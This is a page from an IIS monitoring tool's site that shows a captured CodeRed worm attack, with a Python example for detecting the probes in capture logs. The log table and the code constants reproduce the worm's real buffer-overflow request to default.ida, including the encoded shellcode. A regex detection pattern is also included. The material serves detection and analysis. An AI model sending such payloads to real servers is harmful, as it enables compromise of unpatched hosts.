Interesting captures (CodeRed attack) with IIS Tracer web site monitoring tool

CodeRed attack on an IIS server

CodeRed delivers its payload in a GET request to default.ida. The file does not have to exist: the .ida extension is mapped to the Index Server ISAPI extension (idq.dll), and the overlong query string overflows a buffer in that extension (the flaw fixed by Microsoft bulletin MS01-033). The table below shows how IIS Tracer captures this activity arriving from other servers at your server. The same infected host, 217.11.239.22, probes several addresses of the monitored server in turn (.107, .103, .108, .111); each probe stays open for between half a minute and ten minutes (Running column) while fewer body bytes arrive (2 358) than the request header announced (3 379). The remaining rows are ordinary requests to other sites hosted on the same IIS, shown for contrast.

| Start time | In raw [B] | In content length [B] | Out raw [B] | Out content length [B] | Running [ms] | State | Client | URL |
|---|---|---|---|---|---|---|---|---|
| 13:59:13.554 | 2 358 | 3 379 | 483 | 3 252 | 614 229 | End of request | 217.11.239.22 | GET http://217.11.235.107/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a |
| 14:03:26.104 | | 3 379 | un | | 543 469 | Authentication | 217.11.239.22 | GET http://217.11.235.103/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a |
| 14:09:54.083 | ns | | 10 698 | 10 469 | 14 147 | End of request | 62.24.71.131 | GET http://g.aliaweb.cz/cphistory.obr?LV=1&ID=965&/BLBUNIFO.gif |
| 14:09:54.821 | ns | | 35 237 | 34 805 | 13 088 | End of request | 195.47.108.147 | GET http://zpravodaj.cz/l.asp?LT=ptEkonomika&SF=Ctenost_Celkem |
| 14:10:01.827 | 2 358 | 3 379 | 483 | 3 252 | 36 086 | End of request | 217.11.239.22 | GET http://217.11.235.108/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a |
| 14:10:50.171 | 2 358 | 3 379 | 465 | 3 252 | 35 595 | End of request | 217.11.239.22 | GET http://217.11.235.111/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a |
| 14:11:01.048 | ns | | 29 824 | 29 582 | 41 655 | End of request | 212.20.109.156 | GET http://r.kde.cz/js/nh.js |
| 14:11:25.065 | ns | | 13 302 | 13 074 | 5 978 | End of request | 213.175.33.146 | GET http://e.kde.cz/ban/zpravodaj/zpr_zelen.gif |
| 14:11:27.309 | ns | | 28 849 | 28 624 | 6 274 | End of request | 212.20.120.122 | GET http://r.kde.cz/ban/exchange/horizont2.gif |
| 14:11:35.157 | ns | | 29 824 | 29 582 | 10 039 | End of request | 195.144.126.39 | GET http://r.kde.cz/js/nh.js |
| 14:11:47.583 | ns | | 26 672 | 26 444 | 9 138 | End of request | 195.212.204.131 | GET http://e.kde.cz/ban/akcie/fio_ban1.gif |
| 14:11:50.371 | ns | | 28 849 | 28 624 | 11 891 | End of request | 193.165.145.88 | GET http://r.kde.cz/ban/exchange/horizont2.gif |
| 14:12:28.297 | ns | | un | | 1 275 | URL Mapping | 194.228.119.18 | GET http://www.ariadna.cz/ariadna/getCal.asp?ID=44&head=1&Langver=1&T=MGDRIOC&sort=1&DESC=1 |

Byte counts use a space as thousands separator; the values "ns" and "un" are reproduced as the tool reported them.
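The probes in the table can be picked out of a capture mechanically. The following Python is an added example written for this page; it is not part of IIS Tracer or any Motobit product. The Capture record layout, the function names and the 64-character padding threshold are assumptions; the X-padded URL is the one the table shows, while the N-padded row is constructed to cover the original Code Red variant (which padded the query with N instead of X).

```python
"""Detect Code Red probes in IIS Tracer-style capture rows (added example)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Code Red (July 2001) pads the query with 'N'; Code Red II (August 2001)
# pads it with 'X'. Both then carry the exploit as %uXXXX escapes, which the
# Index Server ISAPI extension (idq.dll, mapped to .ida/.idq) decodes into
# wide characters while overflowing its buffer.
_IDA_OVERFLOW = re.compile(
    r"/default\.ida\?(?P<fill>[NX])(?P=fill){63,}.*%u9090", re.IGNORECASE
)
_UNICODE_ESC = re.compile(r"%u([0-9a-fA-F]{4})")

# Content-length announced by the worm's request header; it is the value the
# "In content length" column of the capture table shows.
CODE_RED_CONTENT_LENGTH = 3379

_PAYLOAD = ("%u9090%u6858%ucbd3%u7801" * 3
            + "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a")
CODE_RED_II_URL = "http://217.11.235.107/default.ida?" + "X" * 224 + _PAYLOAD
CODE_RED_I_URL = "http://217.11.235.107/default.ida?" + "N" * 224 + _PAYLOAD  # constructed


@dataclass
class Capture:
    """One row of a capture; layout assumed for this example."""
    start: str
    client: str
    url: str
    in_content_length: Optional[int] = None


def classify(url: str) -> Optional[str]:
    """Return the worm variant a request URL matches, or None for normal traffic."""
    m = _IDA_OVERFLOW.search(url)
    if m is None:
        return None
    return "CodeRed II" if m.group("fill").upper() == "X" else "CodeRed"


def decode_unicode_escapes(url: str) -> bytes:
    """Turn the %uXXXX escapes into the bytes they become in memory.

    IIS decodes %uXXXX to a 16-bit code unit; on x86 that is stored
    little-endian, so %u9090%u6858%ucbd3%u7801 becomes 90 90 58 68 d3 cb 01 78:
    two NOPs, 'pop eax', 'push 0x7801cbd3'. The pushed value is a fixed address
    inside msvcrt.dll on the Windows builds the worm targeted, which is why the
    exploit only works on those builds. A trailing short escape such as %u00
    does not match and is ignored.
    """
    out = bytearray()
    for m in _UNICODE_ESC.finditer(url):
        out += int(m.group(1), 16).to_bytes(2, "little")
    return bytes(out)


def scan(rows: List[Capture]) -> List[Tuple[str, str, str, bool]]:
    """(start, client, variant, content_length_matches) for every probe row."""
    hits = []
    for row in rows:
        variant = classify(row.url)
        if variant is not None:
            hits.append((row.start, row.client, variant,
                         row.in_content_length == CODE_RED_CONTENT_LENGTH))
    return hits


# Rows modelled on the capture table; the last row is constructed.
SAMPLE_ROWS = [
    Capture("13:59:13.554", "217.11.239.22", CODE_RED_II_URL, 3379),
    Capture("14:09:54.083", "62.24.71.131",
            "http://g.aliaweb.cz/cphistory.obr?LV=1&ID=965&/BLBUNIFO.gif"),
    Capture("14:11:01.048", "212.20.109.156", "http://r.kde.cz/js/nh.js"),
    Capture("14:12:28.297", "194.228.119.18",
            "http://www.ariadna.cz/ariadna/getCal.asp?ID=44&head=1&Langver=1&T=MGDRIOC&sort=1&DESC=1"),
    Capture("14:20:00.000", "10.0.0.5", CODE_RED_I_URL, 3379),
]

if __name__ == "__main__":
    for start, client, variant, cl_ok in scan(SAMPLE_ROWS):
        print(f"{start} {client:16} {variant:11} content-length matches: {cl_ok}")
    print(decode_unicode_escapes(CODE_RED_II_URL).hex(" "))
```

The padding-run check matters more than the `%u9090` check: ordinary requests to other .ida or .idq paths are rare but legitimate on an Index Server host, while a query of sixty-plus identical characters followed by unicode escapes has no benign explanation. The content-length comparison is only corroboration, since a capture stopped in the Authentication or URL Mapping state may not have that value yet.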

© 1996 – 2007 Antonin Foller, Motobit Software, help@pstruh.cz